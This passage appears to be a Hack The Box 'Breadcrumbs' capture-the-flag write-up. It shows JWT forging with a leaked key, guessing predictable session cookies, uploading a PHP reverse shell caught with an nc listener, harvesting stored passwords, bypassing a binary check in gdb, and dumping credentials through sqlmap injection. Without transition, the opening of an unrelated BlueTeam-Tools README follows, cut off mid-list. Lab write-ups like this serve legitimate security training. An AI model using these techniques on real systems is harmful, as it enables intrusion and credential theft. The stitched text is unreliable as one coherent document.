header("Location: ../index.php"); } ... ``` By reading the [login.php](http://10.10.10.228/portal/login.php) page we can see the following: ```php <?php require_once 'authController.php'; ?> <html lang="en"> <head> <title>Binary</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> .... ``` So it's mean we need to read also [authController.php](http://10.10.10.228/portal/authController.php): ```php <?php require 'db/db.php'; require "cookie.php"; require "vendor/autoload.php"; use \\Firebase\\JWT\\JWT; ... if($valid){ session_id(makesession($username)); session_start(); $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e'; $data = array(); $payload = array( "data" => array( "username" => $username )); $jwt = JWT::encode($payload, $secret_key, 'HS256'); setcookie("token", $jwt, time() + (86400 * 30), "/"); $_SESSION['username'] = $username; $_SESSION['loggedIn'] = true; if($userdata[0]['position'] == ""){ $_SESSION['role'] = "Awaiting approval"; } else{ $_SESSION['role'] = $userdata[0]['position']; } header("Location: /portal"); } ... ``` We can see how the Cookies generates: 1. JWT token using ```$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';```. 2. ```PHPSESSID``` (On ```cookies.php```). First, Let's [generate JWT token](https://dinochiesa.github.io/jwt/) for user ```paul``` using the secret key to see the [File Managment](http://10.10.10.228/portal/php/files.php) page: ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU ``` And to generate ```PHPSESSID``` cookie we need to read the page [cookie.php](http://10.10.10.228/portal/authController.php): ```php <?php /** * @param string $username Username requesting session cookie * * @return string $session_cookie Returns the generated cookie * * @devteam * Please DO NOT use default PHPSESSID; our security team says they are predictable. * CHANGE SECOND PART OF MD5 KEY EVERY WEEK * */ function makesession($username){ $max = strlen($username) - 1; $seed = rand(0, $max); $key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890"; $session_cookie = $username.md5($key); return $session_cookie; } ``` As we can see the code of ```cookie.php``` generate random seed ```(0,strlen("paul")-1) ``` so we need to get all possilbe sessions (All possibles numbers from ```0, strlen("paul") - 1```, We can do it by running the following script (Changed at ```cookie.php``` the ```$username``` to ```paul```): ```bash for (( i = 0; i < 50; i++ )); do php cookie.php >> sessions done sort -u sessions ``` By running this we get the following output: ``` paul47200b180ccd6835d25d034eeb6e6390 paul61ff9d4aaefe6bdf45681678ba89ff9d paul8c8808867b53c49777fe5559164708c3 paula2a6a014d3bee04d7df8d5837d62e8c5 ``` By trying each of them we found the following current cookies: ``` PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU ``` Using that we can get the [File Managment](http://10.10.10.228/portal/php/files.php) page: ![filemgmt.JPG](images/filemgmt.JPG) If we are trying to upload ```php``` file we got the following error: ![uploadphp.JPG](images/uploadphp.JPG) By reading [fileController.php](http://10.10.10.228/portal/includes/fileController.php): ```php <?php $ret = ""; require "../vendor/autoload.php"; use \\Firebase\\JWT\\JWT; session_start(); function validate(){ $ret = false; $jwt = $_COOKIE['token']; $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e'; $ret = JWT::decode($jwt, $secret_key, array('HS256')); return $ret; } if($_SERVER['REQUEST_METHOD'] === "POST"){ $admins = array("paul"); $user = validate()->data->username; if(in_array($user, $admins) && $_SESSION['username'] == "paul"){ error_reporting(E_ALL & ~E_NOTICE); $uploads_dir = '../uploads'; $tmp_name = $_FILES["file"]["tmp_name"]; $name = $_POST['task']; if(move_uploaded_file($tmp_name, "$uploads_dir/$name")){ $ret = "Success. Have a great weekend!"; } else{ $ret = "Missing file or title :(" ; } } else{ $ret = "Insufficient privileges. Contact admin or developer to upload code. Note: If you recently registered, please wait for one of our admins to approve it."; } echo $ret; } ``` So it's mean our file should located on ```../uploads``` with the name of the ```task``` POST request section as follow: ```HTTP POST /portal/includes/fileController.php HTTP/1.1 Host: 10.10.10.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------68917574038735738252067892863 Content-Length: 355 Origin: http://10.10.10.228 DNT: 1 Connection: close Referer: http://10.10.10.228/portal/php/files.php Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU -----------------------------68917574038735738252067892863 Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: application/x-php <?php echo "hi"; ?> -----------------------------68917574038735738252067892863 Content-Disposition: form-data; name="task" 1.php -----------------------------68917574038735738252067892863-- ``` It's mean the link of the file is: [http://10.10.10.228/portal/uploads/1.php](http://10.10.10.228/portal/uploads/1.php). Let's try to upload the following [windows php reverse shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php) Navigate it And we get a shell: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ nc -lvp 1234 listening on [any] 1234 ... 10.10.10.228: inverse host lookup failed: Unknown host connect to [10.10.14.14] from (UNKNOWN) [10.10.10.228] 58356 SOCKET: Shell has connected! PID: 7228 Microsoft Windows [Version 10.0.19041.746] (c) 2020 Microsoft Corporation. All rights reserved. C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>whoami breadcrumbs\www-data ``` By enumerating we can found the following folder that contains: ```console c:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData>dir Volume in drive C has no label. Volume Serial Number is 7C07-CD3A Directory of c:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData 02/08/2021 06:37 AM <DIR> . 02/08/2021 06:37 AM <DIR> .. 11/28/2020 02:48 AM 170 alex.disabled 11/28/2020 02:48 AM 170 emma.disabled 11/28/2020 02:48 AM 170 jack.disabled 11/28/2020 02:48 AM 170 john.disabled 01/17/2021 04:11 PM 192 juliette.json 11/28/2020 02:48 AM 170 lucas.disabled 11/28/2020 02:48 AM 170 olivia.disabled 11/28/2020 02:48 AM 170 paul.disabled 11/28/2020 02:48 AM 170 sirine.disabled 11/28/2020 02:48 AM 170 william.disabled 10 File(s) 1,722 bytes 2 Dir(s) 6,525,378,560 bytes free c:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData>type juliette.json { "pizza" : "margherita", "size" : "large", "drink" : "water", "card" : "VISA", "PIN" : "9890", "alternate" : { "username" : "juliette", "password" : "jUli901./())!", } } ``` And we found creds: ```juliette:jUli901./())!```. Let's connect this user using ```ssh```: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ ssh [email protected] The authenticity of host '10.10.10.228 (10.10.10.228)' can't be established. ECDSA key fingerprint is SHA256:JpPYtFfyEYypgrRNtWR/Ekn1RM4ltgVxa41kmIxpkoY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.228' (ECDSA) to the list of known hosts. [email protected]'s password: Microsoft Windows [Version 10.0.19041.746] (c) 2020 Microsoft Corporation. All rights reserved. juliette@BREADCRUMBS C:\Users\juliette>cd Desktop juliette@BREADCRUMBS C:\Users\juliette\Desktop>type user.txt 5bcf94e1a45ccbe8515f2f8d552e04a6 ``` And we get the user flag ```5bcf94e1a45ccbe8515f2f8d552e04a6```. ### User 2 By reading the ```todo.html``` file from ```juliette@BREADCRUMBS C:\Users\juliette\Desktop``` we get the following content: ![todo.JPG](images/todo.JPG) So we have hint about passwords on sticky notes: ``` Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager ``` We get get the sticky notes files from ```C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState```: ```console juliette@BREADCRUMBS C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState>dir Volume in drive C has no label. Volume Serial Number is 7C07-CD3A Directory of C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState 01/15/2021 05:10 PM <DIR> . 01/15/2021 05:10 PM <DIR> .. 01/15/2021 05:10 PM 20,480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session 11/29/2020 04:10 AM 4,096 plum.sqlite 01/15/2021 05:10 PM 32,768 plum.sqlite-shm 01/15/2021 05:10 PM 329,632 plum.sqlite-wal 4 File(s) 386,976 bytes 2 Dir(s) 6,521,532,416 bytes free ``` Let's copy all of them using scp: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ scp [email protected]:/Users/juliette/AppData/Local/Packages/Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe/LocalState/plum.sqlite-wal plum.sqlite-wal ... ``` After the copy let's locate them on another Windows 10 maching on the same location ```C:\Users\evyatar9\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState```: ![sticky.JPG](images/sticky.JPG) And just run the sticky notes to get the notes: ![notes.JPG](images/notes.JPG) And we get the ```develoment``` creds: ```development: fN3)sN5Ee@g```. Let's use those creds using ```ssh```: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ ssh [email protected] [email protected]'s password: Microsoft Windows [Version 10.0.19041.746] (c) 2020 Microsoft Corporation. All rights reserved. development@BREADCRUMBS C:\Users\development> ``` And we logged in as ```develoment``` user. ### Root By enumerating we found the following directory: ```console development@BREADCRUMBS C:\Development>dir Volume in drive C has no label. Volume Serial Number is 7C07-CD3A Directory of C:\Development 01/15/2021 05:03 PM <DIR> . 01/15/2021 05:03 PM <DIR> .. 11/29/2020 04:11 AM 18,312 Krypter_Linux 1 File(s) 18,312 bytes 2 Dir(s) 6,518,198,272 bytes free ``` Let's copy this file ```Krypter_Linux``` using ```scp``` and check what it this file: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ file Krypter_Linux Krypter_Linux: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ab1fa8d6929805501e1793c8b4ddec5c127c6a12, for GNU/Linux 3.2.0, not stripped ``` By running this file we get: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ ./Krypter_Linux Krypter V1.2 New project by Juliette. New features added weekly! What to expect next update: - Windows version with GUI support - Get password from cloud and AUTOMATICALLY decrypt! *** No key supplied. USAGE: Krypter <key> ``` By decompilng this file using [Ghidra](https://ghidra-sre.org/) we can see the ```main``` function: ```c undefined8 main(int param_1,long param_2) { size_t sVar1; basic_ostream *this; ulong uVar2; basic_string local_58 [44]; undefined4 local_2c; long local_28; int local_20; int local_1c; std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(); /* try { // try from 00101263 to 001013cf has its CatchHandler @ 001013e5 */ local_28 = curl_easy_init(); puts( "Krypter V1.2\n\nNew project by Juliette.\nNew features added weekly!\nWhat to expect next update:\n\t- Windows version with GUI support\n\t- Get password from cloud and AUTOMATICALLY decrypt!\n***\n" ); if (param_1 == 2) { local_1c = 0; local_20 = 0; while( true ) { uVar2 = SEXT48(local_20); sVar1 = strlen(*(char **)(param_2 + 8)); if (sVar1 <= uVar2) break; local_1c = local_1c + *(char *)((long)local_20 + *(long *)(param_2 + 8)); local_20 = local_20 + 1; } if (local_1c == 0x641) { if (local_28 != 0) { puts("Requesting decryption key from cloud...\nAccount: Administrator"); curl_easy_setopt(local_28,0x2712,"http://passmanager.htb:1234/index.php"); curl_easy_setopt(local_28,0x271f,"method=select&username=administrator&table=passwords"); curl_easy_setopt(local_28,0x4e2b,WriteCallback); curl_easy_setopt(local_28,0x2711,local_58); local_2c = curl_easy_perform(local_28); curl_easy_cleanup(local_28); puts("Server response:\n\n"); this = std::operator<<((basic_ostream *)std::cout,local_58); std::basic_ostream<char,std::char_traits<char>>::operator<< ((basic_ostream<char,std::char_traits<char>> *)this, std::endl<char,std::char_traits<char>>); } } else { puts("Incorrect master key"); } } else { puts("No key supplied.\nUSAGE:\n\nKrypter <key>"); } std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string ((basic_string<char,std::char_traits<char>,std::allocator<char>> *)local_58); return 0; } ``` As we can see it's make HTTP request to ```http://passmanager.htb:1234/index.php``` (Which is like web server localhost), Because we don't have access to this port on web server - If we want to run it locally we need to create SSH tunnel as follow: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ ssh -N -L 1234:127.0.0.1:1234 [email protected] โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ curl http://localhost:1234/index.php Bad Request ``` By debug this file using [gdb](https://www.gnu.org/software/gdb/) we can break on the if statements and make the program to execute the curl reqeusts as follow: ```asm โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ gdb Krypter_Linux gefโžค disassemble main Dump of assembler code for function main: 0x0000555555555247 <+0>: push rbp 0x0000555555555248 <+1>: mov rbp,rsp 0x000055555555524b <+4>: push rbx 0x000055555555524c <+5>: sub rsp,0x58 0x0000555555555250 <+9>: mov DWORD PTR [rbp-0x54],edi 0x0000555555555253 <+12>: mov QWORD PTR [rbp-0x60],rsi 0x0000555555555257 <+16>: lea rax,[rbp-0x50] 0x000055555555525b <+20>: mov rdi,rax 0x000055555555525e <+23>: call 0x555555555060 <_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev@plt> 0x0000555555555263 <+28>: call 0x5555555550d0 <curl_easy_init@plt> 0x0000555555555268 <+33>: mov QWORD PTR [rbp-0x20],rax 0x000055555555526c <+37>: lea rdi,[rip+0xd9d] # 0x555555556010 0x0000555555555273 <+44>: call 0x5555555550f0 <puts@plt> 0x0000555555555278 <+49>: cmp DWORD PTR [rbp-0x54],0x2 0x000055555555527c <+53>: jne 0x5555555553c4 <main+381> 0x0000555555555282 <+59>: mov DWORD PTR [rbp-0x14],0x0 0x0000555555555289 <+66>: mov DWORD PTR [rbp-0x18],0x0 0x0000555555555290 <+73>: mov eax,DWORD PTR [rbp-0x18] 0x0000555555555293 <+76>: movsxd rbx,eax 0x0000555555555296 <+79>: mov rax,QWORD PTR [rbp-0x60] 0x000055555555529a <+83>: add rax,0x8 0x000055555555529e <+87>: mov rax,QWORD PTR [rax] 0x00005555555552a1 <+90>: mov rdi,rax 0x00005555555552a4 <+93>: call 0x555555555070 <strlen@plt> 0x00005555555552a9 <+98>: cmp rbx,rax 0x00005555555552ac <+101>: jae 0x5555555552d0 <main+137> 0x00005555555552ae <+103>: mov rax,QWORD PTR [rbp-0x60] 0x00005555555552b2 <+107>: add rax,0x8 0x00005555555552b6 <+111>: mov rdx,QWORD PTR [rax] 0x00005555555552b9 <+114>: mov eax,DWORD PTR [rbp-0x18] 0x00005555555552bc <+117>: cdqe 0x00005555555552be <+119>: add rax,rdx 0x00005555555552c1 <+122>: movzx eax,BYTE PTR [rax] 0x00005555555552c4 <+125>: movsx eax,al 0x00005555555552c7 <+128>: add DWORD PTR [rbp-0x14],eax 0x00005555555552ca <+131>: add DWORD PTR [rbp-0x18],0x1 0x00005555555552ce <+135>: jmp 0x555555555290 <main+73> 0x00005555555552d0 <+137>: cmp DWORD PTR [rbp-0x14],0x641 0x00005555555552d7 <+144>: jne 0x5555555553b6 <main+367> 0x00005555555552dd <+150>: cmp QWORD PTR [rbp-0x20],0x0 0x00005555555552e2 <+155>: je 0x5555555553d0 <main+393> 0x00005555555552e8 <+161>: lea rdi,[rip+0xde1] # 0x5555555560d0 0x00005555555552ef <+168>: call 0x5555555550f0 <puts@plt> 0x00005555555552f4 <+173>: mov rax,QWORD PTR [rbp-0x20] 0x00005555555552f8 <+177>: lea rdx,[rip+0xe11] # 0x555555556110 0x00005555555552ff <+184>: mov esi,0x2712 0x0000555555555304 <+189>: mov rdi,rax 0x0000555555555307 <+192>: mov eax,0x0 0x000055555555530c <+197>: call 0x5555555550b0 <curl_easy_setopt@plt> 0x0000555555555311 <+202>: mov rax,QWORD PTR [rbp-0x20] 0x0000555555555315 <+206>: lea rdx,[rip+0xe1c] # 0x555555556138 0x000055555555531c <+213>: mov esi,0x271f 0x0000555555555321 <+218>: mov rdi,rax 0x0000555555555324 <+221>: mov eax,0x0 0x0000555555555329 <+226>: call 0x5555555550b0 <curl_easy_setopt@plt> 0x000055555555532e <+231>: mov rax,QWORD PTR [rbp-0x20] 0x0000555555555332 <+235>: lea rdx,[rip+0xfffffffffffffecc] # 0x555555555205 <_ZL13WriteCallbackPvmmS_> 0x0000555555555339 <+242>: mov esi,0x4e2b 0x000055555555533e <+247>: mov rdi,rax 0x0000555555555341 <+250>: mov eax,0x0 0x0000555555555346 <+255>: call 0x5555555550b0 <curl_easy_setopt@plt> 0x000055555555534b <+260>: lea rdx,[rbp-0x50] 0x000055555555534f <+264>: mov rax,QWORD PTR [rbp-0x20] 0x0000555555555353 <+268>: mov esi,0x2711 0x0000555555555358 <+273>: mov rdi,rax 0x000055555555535b <+276>: mov eax,0x0 0x0000555555555360 <+281>: call 0x5555555550b0 <curl_easy_setopt@plt> 0x0000555555555365 <+286>: mov rax,QWORD PTR [rbp-0x20] 0x0000555555555369 <+290>: mov rdi,rax 0x000055555555536c <+293>: call 0x555555555090 <curl_easy_perform@plt> 0x0000555555555371 <+298>: mov DWORD PTR [rbp-0x24],eax 0x0000555555555374 <+301>: mov rax,QWORD PTR [rbp-0x20] 0x0000555555555378 <+305>: mov rdi,rax 0x000055555555537b <+308>: call 0x555555555030 <curl_easy_cleanup@plt> 0x0000555555555380 <+313>: lea rdi,[rip+0xde6] # 0x55555555616d 0x0000555555555387 <+320>: call 0x5555555550f0 <puts@plt> 0x000055555555538c <+325>: lea rax,[rbp-0x50] 0x0000555555555390 <+329>: mov rsi,rax 0x0000555555555393 <+332>: lea rdi,[rip+0x2d26] # 0x5555555580c0 <_ZSt4cout@@GLIBCXX_3.4> 0x000055555555539a <+339>: call 0x555555555040 <_ZStlsIcSt11char_traitsIcESaIcEERSt13basic_ostreamIT_T0_ES7_RKNSt7__cxx1112basic_stringIS4_S5_T1_EE@plt> 0x000055555555539f <+344>: mov rdx,rax 0x00005555555553a2 <+347>: mov rax,QWORD PTR [rip+0x2c47] # 0x555555557ff0 0x00005555555553a9 <+354>: mov rsi,rax 0x00005555555553ac <+357>: mov rdi,rdx 0x00005555555553af <+360>: call 0x555555555100 <_ZNSolsEPFRSoS_E@plt> 0x00005555555553b4 <+365>: jmp 0x5555555553d0 <main+393> 0x00005555555553b6 <+367>: lea rdi,[rip+0xdc3] # 0x555555556180 0x00005555555553bd <+374>: call 0x5555555550f0 <puts@plt> 0x00005555555553c2 <+379>: jmp 0x5555555553d0 <main+393> 0x00005555555553c4 <+381>: lea rdi,[rip+0xdcd] # 0x555555556198 0x00005555555553cb <+388>: call 0x5555555550f0 <puts@plt> 0x00005555555553d0 <+393>: mov ebx,0x0 0x00005555555553d5 <+398>: lea rax,[rbp-0x50] 0x00005555555553d9 <+402>: mov rdi,rax 0x00005555555553dc <+405>: call 0x5555555550a0 <_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev@plt> 0x00005555555553e1 <+410>: mov eax,ebx 0x00005555555553e3 <+412>: jmp 0x5555555553ff <main+440> 0x00005555555553e5 <+414>: mov rbx,rax 0x00005555555553e8 <+417>: lea rax,[rbp-0x50] 0x00005555555553ec <+421>: mov rdi,rax 0x00005555555553ef <+424>: call 0x5555555550a0 <_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev@plt> 0x00005555555553f4 <+429>: mov rax,rbx 0x00005555555553f7 <+432>: mov rdi,rax 0x00005555555553fa <+435>: call 0x555555555080 <_Unwind_Resume@plt> 0x00005555555553ff <+440>: add rsp,0x58 0x0000555555555403 <+444>: pop rbx 0x0000555555555404 <+445>: pop rbp 0x0000555555555405 <+446>: ret End of assembler dump. ``` We can see the if statements on ```0x00005555555552d0 <+137>: cmp DWORD PTR [rbp-0x14],0x641```, Let's breakpoint at this lines and run it: ```asm gefโžค b *main+137 gefโžค b *main+155 gefโžค r 1 ... file output... gefโžค jump *main+150 gefโžค jump *main+161 Continuing at 0x5555555552e8. Requesting decryption key from cloud... Account: Administrator [New Thread 0x7ffff6c6f700 (LWP 2706099)] [Thread 0x7ffff6c6f700 (LWP 2706099) exited] Server response: selectarray(1) { [0]=> array(1) { ["aes_key"]=> string(16) "k19D193j.<19391(" } } [Inferior 1 (process 2706090) exited normally] ``` And we can see the ```aes_key``` which is ```k19D193j.<19391(```. As we can see from the code it make HTTP request to [http://passmanager.htb:1234/index.php](http://passmanager.htb:1234/index.php`) with ```method=select&username=administrator&table=passwords```. The request body "translate" to something like ```select * from passwords where username=administrator```. Let's try to use ```sqlmap``` against it as follow: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ sqlmap -u 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -p username --dbs ... [23:39:35] [INFO] fetching database names available databases [2]: [*] bread [*] information_schema ``` And we get sql injection, Let's try to read ```bread``` table: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ sqlmap -u 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -p username -D bread --tables ... [23:43:29] [INFO] fetching tables for database: 'bread' Database: bread [1 table] +-----------+ | passwords | +-----------+ ``` Let's dump this table: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ sqlmap -u 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -p username -D bread --tables -T passwords --dump ... [23:45:49] [WARNING] no clear password(s) found Database: bread Table: passwords [1 entry] +----+---------------+------------------+----------------------------------------------+ | id | account | aes_key | password | +----+---------------+------------------+----------------------------------------------+ | 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= | +----+---------------+------------------+----------------------------------------------+ ``` So we have the AES key: ```k19D193j.<19391(``` (Which we already have from ```gdb```) and the cipher text (Base64): ```H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=```. We can decrypt it [online](https://www.devglan.com/online-tools/aes-encryption-decryption): ![aesdecrypt.JPG](images/aesdecrypt.JPG) And we get the Administrator password: ```p@ssw0rd!@#$9890./```. Now, let's connect using ```ssh``` to get the root flag: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ ssh [email protected] [email protected]'s password: Microsoft Windows [Version 10.0.19041.746] (c) 2020 Microsoft Corporation. All rights reserved. administrator@BREADCRUMBS C:\Users\Administrator>cd Desktop administrator@BREADCRUMBS C:\Users\Administrator\Desktop>type root.txt 77d3e50413af3cefa5b5757cb0386997 ``` And we get the root flag ```77d3e50413af3cefa5b5757cb0386997```. ![pwn.JPG](images/pwn.JPG)
# BlueTeam-Tools <p align="center"> <img src="https://user-images.githubusercontent.com/100603074/210680535-40d8c113-2336-4417-bdb4-4825a7477164.png" height="300"> </p> This github repository contains a collection of **65+** **tools** and **resources** that can be useful for **blue teaming activities**. Some of the tools may be specifically designed for blue teaming, while others are more general-purpose and can be adapted for use in a blue teaming context. > ๐Ÿ”— If you are a Red Teamer, check out [RedTeam-Tools](https://github.com/A-poc/RedTeam-Tools) > **Warning** > > *The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.* > **Note** > > *Hide Tool List headings with the arrow.* > > *Click ๐Ÿ”™ to get back to the list.* # Tool List <details open> <summary><b>Blue Team Tips</b> 4 tips</summary> <ul> <ul> <li><b><a href="#payload-extraction-with-process-hacker">Payload extraction with Process Hacker</a></b><i> @embee_research</i></li> <li><b><a href="#prevent-script-execution-via-double-click">Prevent Script Execution via Double Click</a></b><i> Default Application GPO Change</i></li> <li><b><a href="#detect-cryptojacking-malware-with-proxy-logs">Detect Cryptojacking Malware with Proxy Logs</a></b><i> Dave Mckay</i></li> <li><b><a href="#remove-null-bytes-in-cyberchef-malware-analysis">Remove null bytes in CyberChef malware analysis</a></b><i> @Securityinbits</i></li> </ul> </ul> </details> <details open> <summary><b>Network Discovery and Mapping</b> 6 tools</summary> <ul> <ul> <li><b><a href="#nmap">Nmap</a></b><i> Network scanner</i></li> <li><b><a href="#nuclei">Nuclei</a></b><i> Vulnerability scanner</i></li> <li><b><a href="#masscan">Masscan</a></b><i> Fast network scanner</i></li> <li><b><a href="#angry-ip-scanner">Angry IP Scanner</a></b><i> IP/port scanner</i></li> <li><b><a href="#zmap">ZMap</a></b><i> Large network scanner</i></li> <li><b><a href="#shodan">Shodan</a></b><i> Internet facing asset search engine</i></li> </ul> </ul> </details> <details open> <summary><b>Vulnerability Management</b> 4 tools</summary> <ul> <ul> <li><b><a href="#openvas">OpenVAS</a></b><i> Open-source vulnerability scanner</i></li> <li><b><a href="#nessus-essentials">Nessus Essentials</a></b><i> Vulnerability scanner</i></li> <li><b><a href="#nexpose">Nexpose</a></b><i> Vulnerability management tool</i></li> <li><b><a href="#hackerone">HackerOne</a></b><i> Bug Bounty Management Platform</i></li> </ul> </ul> </details> <details open> <summary><b>Security Monitoring</b> 10 tools</summary> <ul> <ul> <li><b><a href="#sysmon">Sysmon</a></b><i> System Monitor for Windows</i></li> <li><b><a href="#kibana">Kibana</a></b><i> Data visualization and exploration</i></li> <li><b><a href="#logstash">Logstash</a></b><i> Data collection and processing</i></li> <li><b><a href="#parsedmarc">parsedmarc</a></b><i> Email DMARC data visualisation</i></li> <li><b><a href="#phishing-catcher">Phishing Catcher</a></b><i> Phishing catcher using Certstream</i></li> <li><b><a href="#maltrail">maltrail</a></b><i> Malicious traffic detection system</i></li> <li><b><a href="#autorunstowineventlog">AutorunsToWinEventLog</a></b><i> Windows AutoRuns Event Parser</i></li> <li><b><a href="#procfilter">procfilter</a></b><i> YARA-integrated process denial framework</i></li> <li><b><a href="#velociraptor">velociraptor</a></b><i> Endpoint visibility and collection tool</i></li> <li><b><a href="#sysmonsearch">SysmonSearch</a></b><i> Sysmon event log visualisation</i></li> </ul> </ul> </details> <details open> <summary><b>Threat Tools and Techniques</b> 11 tools</summary> <ul> <ul> <li><b><a href="#lolbas-projectgithubio">lolbas-project.github.io</a></b><i> Living Off The Land Windows Binaries</i></li> <li><b><a href="#gtfobinsgithubio">gtfobins.github.io</a></b><i> Living Off The Land Linux Binaries</i></li> <li><b><a href="#filesecio">filesec.io</a></b><i> Attacker file extensions</i></li> <li><b><a href="#kql-search">KQL Search</a></b><i> KQL query aggregator</i></li> <li><b><a href="#unprotect-project">Unprotect Project</a></b><i> Malware evasion techniques knowledge base</i></li> <li><b><a href="#chainsaw">chainsaw</a></b><i> Fast Windows Forensic Artefacts Searcher</i></li> <li><b><a href="#freq">freq</a></b><i> Domain generation algorithm malware detection</i></li> <li><b><a href="#yargen">yarGen</a></b><i> YARA rule generator</i></li> <li><b><a href="#emailanalyzer">EmailAnalyzer</a></b><i> Suspicious emails analyser</i></li> <li><b><a href="#vcg">VCG</a></b><i> Code security scanning tool</i></li> <li><b><a href="#cyberchef">CyberChef</a></b><i> GCHQ online data manipulation platform</i></li> </ul> </ul> </details> <details open> <summary><b>Threat Intelligence</b> 4 tools</summary> <ul> <ul> <li><b><a href="#maltego">Maltego</a></b><i> Threat Intelligence Platform</i></li> <li><b><a href="#misp">MISP</a></b><i> Malware Information Sharing Platform</i></li> <li><b><a href="#threatconnect">ThreatConnect</a></b><i> Threat data aggregation</i></li> <li><b><a href="#adversary-emulation-library">Adversary Emulation Library</a></b><i> An open library of adversary emulation plans</i></li> </ul> </ul> </details> <details open> <summary><b>Incident Response Planning</b> 5 tools</summary> <ul> <ul> <li><b><a href="#nist">NIST</a></b><i> Cybersecurity Framework</i></li> <li><b><a href="#incident-response-plan">Incident Response Plan</a></b><i> Framework for incident response</i></li> <li><b><a href="#ransomware-response-plan">Ransomware Response Plan</a></b><i> Framework for ransomware response</i></li> <li><b><a href="#incident-response-reference-guide">Incident Response Reference Guide</a></b><i> Incident preparation guidance paper</i></li> <li><b><a href="#awesome-incident-response">Awesome Incident Response</a></b><i> List of tools for incident response</i></li> </ul> </ul> </details> <details open> <summary><b>Malware Detection and Analysis</b> 11 tools</summary> <ul> <ul> <li><b><a href="#virustotal">VirusTotal</a></b><i> Malicious IOC Sharing Platform</i></li> <li><b><a href="#ida">IDA</a></b><i> Malware disassembler and debugger</i></li> <li><b><a href="#ghidra">Ghidra</a></b><i> Malware reverse engineering tool</i></li> <li><b><a href="#decode-vbe">decode-vbe</a></b><i> Encoded VBE script 